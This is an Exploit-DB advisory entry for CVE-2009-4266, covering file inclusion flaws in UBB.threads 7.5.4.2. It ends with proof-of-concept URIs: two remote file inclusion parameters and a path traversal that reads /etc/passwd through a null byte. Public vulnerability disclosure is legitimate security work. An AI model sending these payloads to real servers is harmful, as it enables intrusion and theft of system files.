UBB.threads 7.5.4 2 - Multiple File Inclusion Vulnerabilities

2009-12-04T00:00:00
ID EDB-ID:10305
Type exploitdb
Reporter R3VAN_BASTARD
Modified 2009-12-04T00:00:00

Description

UBB.threads 7.5.4 2 Multiple File Inclusion Vulnerabilities. CVE-2009-4266. Webapps exploit for php platform

                                        
                                            UBBCentral: http://www.ubbcentral.com/

UBB.threads is prone to multiple file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

UBB.threads 7.5.4.2 is vulnerable; other versions may also be affected. 

POC:
An attacker can exploit these issues via a browser.

The following example URIs are available:

http://server/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI]
http://server/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI]
http://server/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00